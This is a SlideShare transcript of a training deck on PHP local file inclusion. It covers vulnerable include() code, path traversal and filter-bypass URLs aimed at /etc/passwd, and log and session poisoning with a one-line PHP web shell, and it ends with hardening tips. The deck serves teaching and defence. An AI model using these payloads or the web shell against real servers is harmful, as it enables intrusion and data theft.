SlideShare a Scribd company logo

File inclusion

Download as PPTX, PDF
A
AaftabKhan14

File inclusion vulnerabilities allow attackers to include local and remote files on a server. If inclusion logic is not implemented properly, it can lead to source code disclosure, data exposure, and remote code execution. Common file inclusion attacks traverse directories, bypass extensions, inject payloads into log files or PHP sessions that are later executed on the server. Proper input validation and restricting included files can help mitigate these risks.

Technology
1 of 21
$ 7absec -- Aaftab Harun (7absec)
$ 7absec File Inclusion is a common web application vulnerability, which can be easily overlooked as part of the application functionality. Server-side languages such as PHP or JSP can dynamically include external scripts, reducing the script's overall size and simplifying the code.
$ 7absec If the inclusion logic isn't implemented properly, attackers can include both local and remote files, potentially leading to source code disclosure, sensitive data exposure, and code execution under certain conditions.
$ 7absec https://www.ptsecurity.com/ww-en/analytics/web-application-attacks-2019/
$ 7absec Local File Inclusion | Remote File Inclusion
$ 7absec Is an attack done by attacker on WebApp by including the local files that are present on the system.
$ 7absec 1: Explanation -- Use Case 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • The simplest way of local file inclusion. • No restrictions && No parameters. • include($_GET[‘FileName’]);
$ 7absec The World-File inclusion • Linux /etc/passwd http://example.com/?file=/etc/passwd • Windows C:Windowsboot.ini http://example.com/?file=C:Windowsboot.ini 1: Explanation -- Use Case 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques
$ 7absec 1: Basic LFI 2: Explanation – Use Case 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Sometimes, developers specify absolute paths when including files. • include("./file/" . $_GET[‘FileName’]); • Input from parameters can even be used as part of filenames. • include(“file_" . $_GET[‘FileName']);
$ 7absec 1: Basic LFI 2: Explanation – Use Case 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • This restriction can be bypassed by traversing directories using a few ../ before the desired file name. • http://example.com/?file=../../../../../etc/passwd • http://example.com/?file=/../../../../../etc/passwd
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: Explanation – Use Case 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Scripts can employ search and replace techniques to avoid path traversals. • $File = str_replace('../', ‘ ', $_GET[‘FileName']);
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: Explanation – Use Case 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • This restriction can be bypassed by ….//….//….// • http://example.com/?file=....//....//...//etc/passwd • Bypass via URL encoding ../ == %2e%2e%2f • http://example.com/?file= %2e%2e%2f etc/passwd
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: Explanation – Use Case 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Scripts can manually append a .php or any other required extension before including the file • include($_GET['language'] . ".php");
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: Explanation – Use Case 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • PHP versions before 5.5 are vulnerable to null byte injection. • Adding a null byte (x00) at the end of the filename should bypass the extension check. • This can be also bypassed with PHP Wrappers. • http://example.com/?file= /etc/passwdx00
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • LFI can lead to Remote Code Execution (RCE) under some conditions, resulting in a complete server compromise. • One common way is to poison log files, which are modified based on requests to the webserver.
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: Explanation – Use Case B: RCE through PHP Session Files 6: Hardening Techniques • Apache and Nginx maintain various log files such as access.log and error.log. • The access.log file contains information about all requests made to the server and their User-Agent strings. • http://example.com/?file= /var/log/apache2/access.log
$ 7absec • The log contains the remote IP address, request page, response code, and the user-agent string. • <?php system($_GET['cmd']); ?> 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: Explanation – Use Case B: RCE through PHP Session Files 6: Hardening Techniques
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: Explanation – Use Case 6: Hardening Techniques • Similar to server log files, PHP saves user sessions on disk. • This path is dictated by the session.save_path configuration variable, which is empty by default. • http://example.com/?file= /var/lib/php/sessions/sess_$id
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: Explanation – Use Case 6: Hardening Techniques • Injecting PHP web shell into the session log file • http://example.com/?file= <?php system($_GET['cmd']); ?>
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: 1: Use built-in tool basename() open_basedir display_errors disable functions (system, shell_exec, curl_exec, etc.) 2: Doing the Correct Checks use allow_list instead of deny_list
$ 7absec Questions/Suggestions…

Recommended

Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Operating Systems: Computer Security
Operating Systems: Computer SecurityOperating Systems: Computer Security
Operating Systems: Computer SecurityDamian T. Gordon
 
API Security Fundamentals
API Security FundamentalsAPI Security Fundamentals
API Security FundamentalsJosé Haro Peralta
 
LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
Host Header injection - Slides
Host Header injection - SlidesHost Header injection - Slides
Host Header injection - SlidesAmit Dubey
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksImperva
 

Recommended

Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Operating Systems: Computer Security
Operating Systems: Computer SecurityOperating Systems: Computer Security
Operating Systems: Computer SecurityDamian T. Gordon
 
API Security Fundamentals
API Security FundamentalsAPI Security Fundamentals
API Security FundamentalsJosé Haro Peralta
 
LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
Host Header injection - Slides
Host Header injection - SlidesHost Header injection - Slides
Host Header injection - SlidesAmit Dubey
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksImperva
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Lfi
LfiLfi
Lfipenetration Tester
 
Secure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior
 
Injection flaws
Injection flawsInjection flaws
Injection flawsDANISH INAMDAR
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringbartblaze
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
Jhon the ripper
Jhon the ripper Jhon the ripper
Jhon the ripper Merve Karabudağ
 
OWASP Top Ten
OWASP Top TenOWASP Top Ten
OWASP Top TenChristian Heinrich
 
Metasploit
MetasploitMetasploit
MetasploitLalith Sai
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
File upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationFile upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationOnwukike Chinedu. CISA, CEH, COBIT5 LI, CCNP
 
Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attackPrashant Hegde
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017HackerOne
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop Ivan Novikov
 
Php through the eyes of a hoster confoo
Php through the eyes of a hoster confooPhp through the eyes of a hoster confoo
Php through the eyes of a hoster confooCombell NV
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 

More Related Content

What's hot

OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Secure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringbartblaze
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attackPrashant Hegde
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017HackerOne
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 

What's hot (20)

OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
Lfi
LfiLfi
Lfi
 
Secure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusion
 
Injection flaws
Injection flawsInjection flaws
Injection flaws
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineering
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples
 
Jhon the ripper
Jhon the ripper Jhon the ripper
Jhon the ripper
 
OWASP Top Ten
OWASP Top TenOWASP Top Ten
OWASP Top Ten
 
Metasploit
MetasploitMetasploit
Metasploit
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
File upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationFile upload vulnerabilities & mitigation
File upload vulnerabilities & mitigation
 
Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attack
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 

Similar to File inclusion

Php through the eyes of a hoster confoo
Php through the eyes of a hoster confooPhp through the eyes of a hoster confoo
Php through the eyes of a hoster confooCombell NV
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentationwebhostingguy
 
Securing Your Web Server
Securing Your Web ServerSecuring Your Web Server
Securing Your Web Servermanugoel2003
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Combell NV
 
Interoperable PHP
Interoperable PHPInteroperable PHP
Interoperable PHPweltling
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
An introduction to php shells
An introduction to php shellsAn introduction to php shells
An introduction to php shellsRichieSM
 
Php Conference Brazil - Phalcon Giant Killer
Php Conference Brazil - Phalcon Giant KillerPhp Conference Brazil - Phalcon Giant Killer
Php Conference Brazil - Phalcon Giant KillerJackson F. de A. Mafra
 
PHP on Heroku: Deploying and Scaling Apps in the Cloud
PHP on Heroku: Deploying and Scaling Apps in the CloudPHP on Heroku: Deploying and Scaling Apps in the Cloud
PHP on Heroku: Deploying and Scaling Apps in the CloudSalesforce Developers
 

Similar to File inclusion (20)

Php through the eyes of a hoster confoo
Php through the eyes of a hoster confooPhp through the eyes of a hoster confoo
Php through the eyes of a hoster confoo
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
 
PHP ITCS 323
PHP ITCS 323PHP ITCS 323
PHP ITCS 323
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentation
 
Securing Your Web Server
Securing Your Web ServerSecuring Your Web Server
Securing Your Web Server
 
Php intro
Php introPhp intro
Php intro
 
EC CUBE 3.0.x installation guide
EC CUBE 3.0.x installation guideEC CUBE 3.0.x installation guide
EC CUBE 3.0.x installation guide
 
PHP
PHPPHP
PHP
 
PHP {in}security
PHP {in}securityPHP {in}security
PHP {in}security
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11
 
Interoperable PHP
Interoperable PHPInteroperable PHP
Interoperable PHP
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
An introduction to php shells
An introduction to php shellsAn introduction to php shells
An introduction to php shells
 
Php Conference Brazil - Phalcon Giant Killer
Php Conference Brazil - Phalcon Giant KillerPhp Conference Brazil - Phalcon Giant Killer
Php Conference Brazil - Phalcon Giant Killer
 
Phalcon - Giant Killer
Phalcon - Giant KillerPhalcon - Giant Killer
Phalcon - Giant Killer
 
Nginx pres
Nginx presNginx pres
Nginx pres
 
PHP on Heroku: Deploying and Scaling Apps in the Cloud
PHP on Heroku: Deploying and Scaling Apps in the CloudPHP on Heroku: Deploying and Scaling Apps in the Cloud
PHP on Heroku: Deploying and Scaling Apps in the Cloud
 
Php ppt
Php pptPhp ppt
Php ppt
 
Download It
Download ItDownload It
Download It
 

Recently uploaded

Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsAndrey Dotsenko
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 

Recently uploaded (20)

Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 

File inclusion

  • 1. $ 7absec -- Aaftab Harun (7absec)
  • 2. $ 7absec File Inclusion is a common web application vulnerability, which can be easily overlooked as part of the application functionality. Server-side languages such as PHP or JSP can dynamically include external scripts, reducing the script's overall size and simplifying the code.
  • 3. $ 7absec If the inclusion logic isn't implemented properly, attackers can include both local and remote files, potentially leading to source code disclosure, sensitive data exposure, and code execution under certain conditions.
  • 5. $ 7absec Local File Inclusion | Remote File Inclusion
  • 6. $ 7absec Is an attack done by attacker on WebApp by including the local files that are present on the system.
  • 7. $ 7absec 1: Explanation -- Use Case 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • The simplest way of local file inclusion. • No restrictions && No parameters. • include($_GET[‘FileName’]);
  • 8. $ 7absec The World-File inclusion • Linux /etc/passwd http://example.com/?file=/etc/passwd • Windows C:Windowsboot.ini http://example.com/?file=C:Windowsboot.ini 1: Explanation -- Use Case 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques
  • 9. $ 7absec 1: Basic LFI 2: Explanation – Use Case 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Sometimes, developers specify absolute paths when including files. • include("./file/" . $_GET[‘FileName’]); • Input from parameters can even be used as part of filenames. • include(“file_" . $_GET[‘FileName']);
